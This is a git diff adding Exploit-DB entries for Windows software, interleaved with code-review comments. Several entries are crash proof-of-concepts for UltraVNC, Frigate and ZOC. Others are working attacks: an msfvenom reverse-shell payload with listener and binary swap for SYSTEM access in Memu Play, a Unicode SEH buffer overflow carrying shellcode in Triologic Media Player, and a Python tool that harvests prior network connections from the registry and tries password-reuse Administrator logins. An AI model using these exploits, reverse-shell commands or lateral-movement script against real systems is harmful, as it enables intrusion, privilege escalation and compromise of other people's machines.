b/exploits/windows/dos/48287.py new file mode 100755 index 000000000..01d5a7147 --- /dev/null +++ b/exploits/windows/dos/48287.py 
@@ -0,0 +1,26 @@
+# Exploit Title: Frigate 3.36 - Denial of Service (PoC)
+# Date: 2020-04-05
+# Exploit Author: inter
+# Vendor Homepage: http://www.Frigate3.com/
+# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
+# Vulnerable Software: Firgate
+# Version: 3.36
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on: Windows 7 Ultimate Service Pack 1 (64 bit - English)
+
+#Steps to Produce the Crash:
+
+# 1.- Run python code: crash.py
+# 2.- Copy content to clipboard
+# 3.- Open "Frigate3.exe"
+# 4.- Go to "Disk" > Find Computer
+# 5.- Paste ClipBoard into the "Computer Name:" field
+# 6.- Click on OK
+# 7.- Crashed
+
+#Python "crash.py" Code:
+
+buffer = "\x41" * 2000
+f = open ("Frigate.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48288.py b/exploits/windows/dos/48288.py
new file mode 100755
index 000000000..e0a122ff7
--- /dev/null
+++ b/exploits/windows/dos/48288.py
@@ -0,0 +1,23 @@
+# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.uvnc.com/
+# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
+# Tested Version: 1.2.4.0
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py
+#2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard
+#3.- Open UltraVNC Launcher
+#4.- Select "Properties"
+#5.- In "Repeater host" Paste Clipboard
+#6.- Click on "OK"
+#7.- Crashed
+
+cod = "\x41" * 300
+
+f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48290.py b/exploits/windows/dos/48290.py
new file mode 100755
index 000000000..eee1b4ddc
--- /dev/null
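Review bot: `f = open ("Frigate.txt", "w")` is never closed if the write fails; the same open/write/close triple appears in 48288.py, 48290.py, 48291.py and 48292.txt and should be `with open("Frigate.txt", "w") as f:` / `    f.write(buffer)` in each. The step list refers to crash.py while the file is distributed as 48287.py, and the header has `Vulnerable Software: Firgate` (typo for Frigate). Unlike the webapp entries in this commit, none of these five headers names the vulnerable field in a 'Vulnerable Parameter' line, even though each step list identifies one.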
+++ b/exploits/windows/dos/48290.py
@@ -0,0 +1,24 @@
+# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.uvnc.com/
+# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
+# Tested Version: 1.2.4.0
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_1.2.40-Launcher_Password.py
+#2.- Open UltraVNC_1.2.40-Launcher_Password.txt and copy content to clipboard
+#3.- Open UltraVNC Launcher
+#4.- Select "Properties"
+#5.- In "Password" Paste Clipboard
+#6.- Click on "OK"
+#7.- Click on "Propieties"
+#8.- Crashed
+
+cod = "\x41" * 300
+
+f = open('UltraVNC_1.2.40-Launcher_Password.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48291.py b/exploits/windows/dos/48291.py
new file mode 100755
index 000000000..f926016a6
--- /dev/null
+++ b/exploits/windows/dos/48291.py
@@ -0,0 +1,22 @@
+# Exploit Title: UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.uvnc.com/
+# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
+# Tested Version: 1.2.4.0
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+#1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py
+#2.- Open UltraViewer_VNCServer.txt and copy content to clipboard
+#3.- Open UltraVNC Viewer
+#4.- In "VNC Server" Paste Clipboard
+#5.- Click on "Connect"
+#6.- Crashed
+
+cod = "\x41" * 256
+
+f = open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48292.txt b/exploits/windows/dos/48292.txt
new file mode 100644
index 000000000..7155a42ed
--- /dev/null
+++ b/exploits/windows/dos/48292.txt
@@ -0,0 +1,22 @@
+# Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.emtec.com
+# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
+# Tested Version: 7.25.5
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+#1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py
+#2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard
+#3.- Open ZOC Terminal
+#4.- Select File > Create SSH Key Files...
+#5.- Select "Private key file:" field erease and Paste ClipBoard
+#6.- Click on "Create public/private key files..."
+#7.- Crashed
+
+buffer = "\x41" * 2000
+f = open ("ZOC_7.25.5_PrivateKeyFile.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48283.txt b/exploits/windows/local/48283.txt
new file mode 100644
index 000000000..f6b3529a0
--- /dev/null
+++ b/exploits/windows/local/48283.txt
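Review bot: This entry is stored as 48292.txt but its body is a Python script, and step 1 tells the reader to run `ZOC_7.25.5_PrivateKeyFile.py`, so the extension and the steps disagree; either store it as .py like the sibling 48290.py/48291.py or change step 1 to name the .txt. The header's `Vulnerability Type: Local` omits the 'Denial of Service (DoS)' wording that the title and the other DoS entries in this commit use. Step 5 has `erease` for erase.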
@@ -0,0 +1,70 @@
+# Exploit Title: Memu Play 7.1.3 - Insecure Folder Permissions
+# Discovery by: chuyreds
+# Discovery Date: 2020-03-08
+# Vendor Homepage: https://www.memuplay.com/
+# Software Link : https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release
+# Tested Version: 7.1.3
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Description:
+# Memu Play 7.1.3 suffers from Privilege Escalation due to insecure file permissions
+
+# Prerequisites
+# Local, Low privilege access with restart capabilities
+
+# Details
+# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.
+# A low privilege account is able to rename the MemuService.exe file located in this same path and replace
+# with a malicious file that would connect back to an attacking computer giving system level privileges
+# (nt authority\system) due to the service running as Local System.
+# While a low privilege user is unable to restart the service through the application, a restart of the
+# computer triggers the execution of the malicious file.
+
+C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
+C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)
+ BUILTIN\Administradores:(I)(F)
+ BUILTIN\Usuarios:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+ APPLICATION PACKAGE AUTHORITY\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)
+
+Se procesaron correctamente 1 archivos; error al procesar 0 archivos
+
+
+C:\>sc qc MEmuSVC
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: MEmuSVC
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : MEmuSVC
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+# Proof of Concept
+
+1. Generate malicious .exe on attacking machine
+ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe
+
+2. Setup listener and ensure apache is running on attacking machine
+ nc -lvp 443
+ service apache2 start
+
+3. Download malicious .exe on victim machine
+ Open browser to http://192.168.1.130/MemuService.exe and download
+
+4. Overwrite file and copy malicious .exe.
+ Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak
+ Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\
+
+5. Restart victim machine
+
+6. Reverse Shell on attacking machine opens
+ C:\Windows\system32>whoami
+ whoami
+ nt authority\system
\ No newline at end of file
diff --git a/exploits/windows/local/48293.py b/exploits/windows/local/48293.py
new file mode 100755
index 000000000..13ca75c29
--- /dev/null
+++ b/exploits/windows/local/48293.py
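Review bot: The Details paragraph states that "the Authenticated Users group has the modify permission to ESM folders/files", but the icacls output directly below shows `Everyone:(I)(F)` and `BUILTIN\Usuarios:(I)(F)`, i.e. Full control rather than modify and for a broader set of principals; "ESM" reads like a leftover from another write-up. A wording that matches the evidence is `# By default Everyone and BUILTIN\Users hold inherited Full control (F) on the MEmu install folder/files as shown below.` The `(I)` flag marks those ACEs as inherited, so the weak permission presumably sits on the parent directory rather than on MemuService.exe alone, which is where a hardening check or vendor fix would have to apply — worth stating next to the `sc qc` output, which confirms the service runs as LocalSystem.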
@@ -0,0 +1,79 @@ +# Exploit Title: Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH) +# Date: 2020-04-04 +# Author: Felipe Winsnes +# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html +# Version: 8 +# Tested on: Windows 7 (x86) + +# Proof of Concept: +# 1.- Run the python script, it will create a new file called "poc.m3l". +# 2.- Open the Application. +# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK. +# 4.- Click on the bottom-right button that displays an arrow and has written "LIST". +# 5.- Select the file "poc.m3l". +# 6.- Profit. + +import struct + +# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread +# Payload size: 512 bytes + +buf = b"" +buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" +buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" +buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" +buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" +buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" +buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" +buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" +buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" +buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" +buf += b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61\x72" +buf += b"\x39\x70\x6b\x50\x49\x70\x73\x30\x54\x49\x47\x75\x70" +buf += b"\x31\x79\x30\x4f\x74\x72\x6b\x70\x50\x70\x30\x32\x6b" +buf += b"\x51\x42\x7a\x6c\x74\x4b\x42\x32\x6e\x34\x64\x4b\x64" +buf += b"\x32\x6b\x78\x6c\x4f\x57\x47\x4d\x7a\x4d\x56\x4e\x51" +buf += b"\x59\x6f\x46\x4c\x4f\x4c\x71\x51\x61\x6c\x49\x72\x4c" +buf += b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57" +buf += b"\x69\x52\x7a\x52\x31\x42\x51\x47\x74\x4b\x6e\x72\x4a" +buf += b"\x70\x44\x4b\x30\x4a\x4d\x6c\x34\x4b\x6e\x6c\x5a\x71" +buf += 
b"\x74\x38\x39\x53\x6d\x78\x49\x71\x5a\x31\x70\x51\x62" +buf += b"\x6b\x70\x59\x6b\x70\x5a\x61\x46\x73\x62\x6b\x4e\x69" +buf += b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62" +buf += b"\x6b\x4a\x61\x36\x76\x4c\x71\x59\x6f\x44\x6c\x45\x71" +buf += b"\x58\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73" +buf += b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b\x31\x6d" +buf += b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f" +buf += b"\x34\x6a\x61\x7a\x33\x31\x56\x54\x4b\x4c\x4c\x6e\x6b" +buf += b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a" +buf += b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54" +buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\x62\x39\x70\x5a\x6f" +buf += b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b" +buf += b"\x4d\x42\x38\x6b\x34\x4d\x4f\x6d\x42\x4a\x49\x71\x62" +buf += b"\x6d\x42\x65\x45\x62\x69\x70\x39\x70\x59\x70\x50\x50" +buf += b"\x51\x58\x4d\x61\x74\x4b\x42\x4f\x33\x57\x6b\x4f\x46" +buf += b"\x75\x37\x4b\x47\x70\x6b\x6d\x6e\x4a\x5a\x6a\x53\x38" +buf += b"\x46\x46\x52\x75\x65\x6d\x45\x4d\x6b\x4f\x57\x65\x6d" +buf += b"\x6c\x7a\x66\x43\x4c\x6c\x4a\x35\x30\x59\x6b\x67\x70" +buf += b"\x50\x75\x6b\x55\x45\x6b\x4d\x77\x5a\x73\x32\x52\x52" +buf += b"\x4f\x30\x6a\x59\x70\x51\x43\x69\x6f\x38\x55\x52\x43" +buf += b"\x50\x61\x32\x4c\x61\x53\x6c\x6e\x43\x35\x51\x68\x6f" +buf += b"\x75\x4d\x30\x41\x41" + +nseh = "\x71\x41" +seh = "\x41\x4a" + +alignment = "" +alignment += "\x54\x71" # push ebx, padding +alignment += "\x58\x71" # pop eax, padding +alignment += "\x05\x20\x22" # add eax, 0x22002000 +alignment += "\x71" # Padding +alignment += "\x2D\x19\x22" # sub eax, 0x22001900 +alignment += "\x71" # Padding +alignment += "\x50\x71" # push eax, padding +alignment += "\xC3" # retn + +buffer = "A" * 536 + nseh + seh + "\x41\x71\x41\x71" + alignment + "C" * 71 + buf + "C" * 2000 +f = open ("poc.m3l", "w") +f.write(buffer) +f.close() \ No newline at end of file 
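Review bot: `buf` is assembled from `b""` byte literals while `nseh`, `seh`, `alignment` and the `"A" * 536` padding are `str`, so the concatenation on the `buffer = ...` line raises TypeError under Python 3 and the script only runs on Python 2, where `bytes` is an alias of `str`; nothing in the header says so. A comment above `buf = b""` such as `# Python 2 only: buf is bytes, the surrounding padding and SEH fields are str` would spare the next reader a failed run.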
diff --git a/exploits/windows/local/48299.txt b/exploits/windows/local/48299.txt
new file mode 100644
index 000000000..654d0b495
--- /dev/null
+++ b/exploits/windows/local/48299.txt
@@ -0,0 +1,313 @@
+# Title: Microsoft NET USE win10 - Insufficient Authentication Logic
+# Date: 2020-04-04
+# Author: hyp3rlinx
+# Vendor: www.microsoft.com
+# CVE: N/A
+
+
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Windows "net use" Command
+
+Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections.
+The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections.
+
+
+[Vulnerability Type]
+Insuffient Password Prompt
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account
+is enabled and both remote and originating systems suffer from password reuse. This also works as "standard" user but unfortunately
+we do not gain high integrity privileges. However, it opens the door and increases the attack surface if the box we laterally move to
+has other vulnerabilities present.
+
+In contrast authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as expected.
+The authentication mechanism between the two network logon methods are inconsistent and in my opinion leaves an authentication loophole invitation.
+Moreover, since this targets built-in Administrator account, one would think there would be more or equal security measures in place not less.
+
+Requirements:
+1) Remote system built-in Administrator account is enabled
+2) Origination system users account password and the remote system Administrator passwords match (reuse).
+
+Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy" but NOT in this case.
+Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist and is NOT enabled and has no bearing on the issue.
+
+However, if "FilterAdministratorToken" is enabled in registry on the remote system then the above loophole scenario fails.
+Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the Windows registry.
+
+Therefore, if an attacker pops a box they can check "MountPoints2" registry values usually used by forensic analysts for previous network connections
+and try them and if theres password reuse (likely) BOOM automagic logon.
+
+This vuln occurs due to an inconsistent password dialog prompting and whether the "net use" logon method is used.
+When testing make sure to logout then log back in after changing passwords so the environment is clean.
+
+e.g.
+
+1) Passwords for both systems are different and remote built-in Administrator account active:
+
+C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator
+
+Enter the password for 'Administrator' to connect to '192.168.x.x':
+System error 5 has occurred.
+
+Access is denied.
+
+2) Passwords for both origination system and remote match:
+
+C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator
+The command completed successfully.
+
+By the way as a side note DCERPC calls work as well, if both systems happen to have same password.
+c:\>getmac /s x.x.x.x /U Administrator
+
+MSRC in their response, pointed out that "No login prompt on remote connection if both Administrator password are the same."
+Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred dialog box?
+
+Expected result: Consistent password dialog box, no matter if passwords match or not.
+Actual Result: No prompt for a password if both systems passwords are the same.
+ +Tested successfully on fully patched Windows 10 using VM, also across LAN to a non-domain connected PC. + + +[Exploit/POC] +import os,re,time,signal,sys +from subprocess import * +from multiprocessing import Process + +#By John Page (aka hyp3rlinx) +#Apparition Security +#twitter.com/hyp3rlinx +#----------------------------------- +#When a remote systems built-in Administrator account is enabled and both the remote and the target system +#passwords match (password reuse) theres no prompt for credentials and we get logged in automagically. +# +#MountPoints2 and Terminal server client hints in the Windows registry can help us. +#Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously. +#REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons) +#MountPoints2 key entries are stored like '##10.2.1.40#c$' +#----------------------------------------------------------- + +BANNER=""" + _ ______________ ___ ____ __ _______ ______ + / | / / ____/_ __/ / | / __ )/ / / / ___// ____/ + / |/ / __/ / / / /| | / __ / / / /\__ \/ __/ + / /| / /___ / / / ___ |/ /_/ / /_/ /___/ / /___ +/_/ |_/_____/ /_/ /_/ |_/_____/\____//____/_____/ + + By Hyp3rlinx + ApparitionSec +""" + +DRIVE="X" +FINDME="The command completed successfully." +REG_MOUNT2='REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"' +REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\""+" /s" +VULN_FOUND=set() +DELAY=2 #Any lower and we may get inaccurate results. +rdp_server_lst=[] + +#Return prior network logons to remote systems. +def mountpoints2(): + mntpoint2_connections=[] + try: + p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True) + tmp = p.stdout.readlines() + except Exception as e: + print("[!] 
"+str(e)) + return False + for x in tmp: + idx = x.find("##") + clean = x[idx:] + idx2 = clean.rfind("#") + ip = clean[2:idx2] + ip = re.sub(r"#.*[A-Z,a-z]","",ip) + if ip not in mntpoint2_connections: + mntpoint2_connections.append(ip) + mntpoint2_connections = list(filter(None, mntpoint2_connections)) + p.kill() + return mntpoint2_connections + + +#Terminal server client stores remote server connections. +def rdp_svrs(): + global rdp_server_lst + try: + p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True) + tmp = p.stdout.readlines() + for key in tmp: + if key.find("Servers")!=-1: + pos = key.rfind("\\") + srv = key[pos + 1:].replace("\r\n","").strip() + rdp_server_lst.append(srv) + p.kill() + except Exception as e: + print("[!] "+str(e)) + return False + return True + + +#Disconnect +def del_vuln_connection(ip): + try: + print("[!] Disconnecting vuln network logon connection.\n") + call(r"net use "+DRIVE+":"+" /del") + except Exception as e: + print("[!] "+str(e)) + + +#Check connection +def chk_connection(ip): + print("[+] Testing: "+ip) + sys.stdout.flush() + cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True) + stderr, stdout = cmd.communicate() + if "Reply from" in stderr and "Destination host unreachable" not in stderr: + print("[*] Target up!") + return True + else: + print("[!] 
Target unreachable :(") + return False + + +#Test vuln +def Test_Password_Reuse(ip): + print("[+] Testing "+ip + " the builtin Administrator account.\n") + sys.stdout.flush() + try: + p = Popen("net use X: \\\\"+ip+"\\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True) + err = p.stderr.readlines() + + if err: + e = str(err) + if e.find("error 53")!=-1: + print("[*] Network path not found\n") + return + elif e.find("error 1219")!=-1: + print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n") + return + elif e.find("error 85")!=-1: + print("[*] The local device name is already in use.\n") + return + else: + print(e+"\n") + + tmp = p.stdout.read() + + if FINDME in tmp: + print("[*] Password reuse for the built-in Administrator found!") + print("[+] Connected to target: "+ ip) + VULN_FOUND.add(ip+":Administrator") + del_vuln_connection(ip) + p.kill() + except Exception as e: + print("[!] "+str(e)) + + + +#Authenticate +def auth(ip): + action_process = Process(target=Test_Password_Reuse, args=(ip,)) + action_process.start() + action_process.join(timeout=5) + action_process.terminate() + + +if __name__ == "__main__": + + print(BANNER) + print("[+] Windows 'net use' Network Logon Type-3") + print("[+] Insufficient Password Prompt") + print("[+] By hyp3rlinx\n") + + time.sleep(3) + + print("[+] Deleting any existing network logons to start clean.") + + #Make sure no exist sessions already exist. + call(r"net use * /del /y") + sys.stdout.flush() + time.sleep(1) + + + #Grab previous connections from MountPoints2 if any. + rdp_svrs() + svrlst=mountpoints2() + + if svrlst: + svrlst + rdp_server_lst + else: + svrlst = rdp_server_lst + + if not svrlst: + print("[*] No MountPoints2 artifacts found, enter an IP.") + sys.stdout.flush() + ip=raw_input("[+] Target IP> ") + if chk_connection(ip): + auth(ip) + else: + #We have MountPoints2 or RDP Server list IP we can try. 
+ for ip in svrlst: + if chk_connection(ip): + auth(ip) + + time.sleep(DELAY) + + + if len(VULN_FOUND) != 0: + print("[*] Located the following vulnerable systems:") + sys.stdout.flush() + for v in VULN_FOUND: + print("[+] "+v) + else: + print("[+] All previous attempts failed, enter an IP and give it a shot!.") + sys.stdout.flush() + ip=raw_input("[+] Target IP> ") + if chk_connection(ip): + auth(ip) + + + +[POC Video URL] +https://www.youtube.com/watch?v=Je93Neb0k8g + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: February 28, 2020 +MSRC "behavior you are reporting is by design" : March 30, 2020 +April 5, 2020 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 083c698cc..ebfba676e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
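Review bot: In `chk_connection`, `stderr, stdout = cmd.communicate()` unpacks the tuple in the wrong order — `Popen.communicate()` returns `(stdout, stderr)` — so the variable named `stderr` actually holds ping's standard output, and the `"Reply from" in stderr` test only works because of that swap; `stdout, stderr = cmd.communicate()` with `if "Reply from" in stdout and "Destination host unreachable" not in stdout:` says what it does. `Test_Password_Reuse` hardcodes `"net use X: ..."` while `del_vuln_connection` builds its command from `DRIVE`, so changing `DRIVE` would leave behind exactly the mapped drive that the cleanup step is meant to remove; deriving both commands from `DRIVE` keeps them in step. `raw_input` and the `str` handling of `p.stdout.readlines()` make the embedded script Python 2 only, which the advisory does not state anywhere.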
@@ -6692,6 +6692,14 @@ id,file,description,date,author,type,platform,port
 48259,exploits/windows/dos/48259.py,"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)",2020-03-27,"Ivan Marmolejo",dos,windows,
 48269,exploits/windows/dos/48269.py,"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)",2020-03-31,"Paras Bhatia",dos,windows,
 48276,exploits/windows/dos/48276.py,"DiskBoss 7.7.14 - Denial of Service (PoC)",2020-04-01,"Paras Bhatia",dos,windows,
+48284,exploits/windows/dos/48284.py,"Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
+48285,exploits/windows/dos/48285.py,"SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
+48286,exploits/windows/dos/48286.py,"Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
+48287,exploits/windows/dos/48287.py,"Frigate 3.36 - Denial of Service (PoC)",2020-04-06,inter,dos,windows,
+48288,exploits/windows/dos/48288.py,"UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48290,exploits/windows/dos/48290.py,"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48291,exploits/windows/dos/48291.py,"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
+48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11011,6 +11019,9 @@ id,file,description,date,author,type,platform,port
 48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows,
 48279,exploits/windows/local/48279.py,"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2020-04-02,"Paras Bhatia",local,windows,
 48281,exploits/windows/local/48281.py,"AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)",2020-04-03,Hodorsec,local,windows,
+48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows,
+48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
+48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42526,3 +42537,9 @@ id,file,description,date,author,type,platform,port
 48270,exploits/hardware/webapps/48270.py,"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
 48271,exploits/hardware/webapps/48271.py,"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
 48280,exploits/php/webapps/48280.py,"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution",2020-04-03,"Basim Alabdullah",webapps,php,
+48289,exploits/php/webapps/48289.txt,"LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,php,
+48294,exploits/multiple/webapps/48294.rb,"Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)",2020-04-06,"Mehmet Ince",webapps,multiple,
